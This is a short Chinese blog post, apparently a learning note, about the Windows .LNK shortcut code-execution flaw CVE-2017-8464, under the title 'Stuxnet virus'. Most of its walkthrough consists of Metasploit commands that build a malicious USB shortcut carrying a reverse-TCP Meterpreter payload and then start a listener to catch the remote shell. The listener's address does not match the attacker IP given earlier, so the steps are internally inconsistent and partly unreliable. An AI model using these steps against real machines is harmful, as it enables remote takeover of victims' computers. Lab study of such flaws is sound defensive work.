BlackManba

该blog用于记录一些学习总结和心得,请大佬们多指正。

  • 主页
  • 随笔
所有文章 友链 关于我

BlackManba

该blog用于记录一些学习总结和心得,请大佬们多指正。

  • 主页
  • 随笔

震网病毒

2017-11-26

原理:

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。
当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,
恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。
创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
实验环境:同一局域网下进行攻击(公网下攻击正在研究了解后会更新),kali2.0,msfconsole 16
靶机ip 192.168.0.14
攻击机ip 192.168.0.55

过程

1.首先生成u盘攻击文件:
use exploit/windows/fileformat/cve_2017_8464_lnk_rce (使用该漏洞)

set payload windows/x64/meterpreter/reverse_tcp (设置payload以reverse形式的)

set target 1

set lhost 192.168.0.55

set lport 55555

exploit
image
2.会生成如上的文件将文件考到u盘中
3.接下来进行监听返回的端口
use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.14

exploit
image
4.成功
image

赏

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
python中的一些图片处理
vps翻墙简单教程
© 2019 BlackManba
Hexo Theme Yilia by Litten
  • 所有文章
  • 友链
  • 关于我

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置:

      jsonContent:
        meta: false
        pages: false
        posts:
          title: true
          date: true
          path: true
          text: false
          raw: false
          content: false
          slug: false
          updated: false
          comments: false
          link: false
          permalink: false
          excerpt: false
          categories: false
          tags: true
    

  • 潘大佬
  • 铁棚大佬
  • 葛大佬
  • 司令大佬
  • github
座右铭:潜心学习低调发展

爱好:学习

邮箱:yangtao6693@foxmail.com

简介:本人是一个刚进入安全圈的萌新,喜欢研究web方面的安全,其他一些二进制逆向也在慢慢学习。该blog用于记录一些学习总结和心得也会分享一些生活趣事,请大佬们多指正。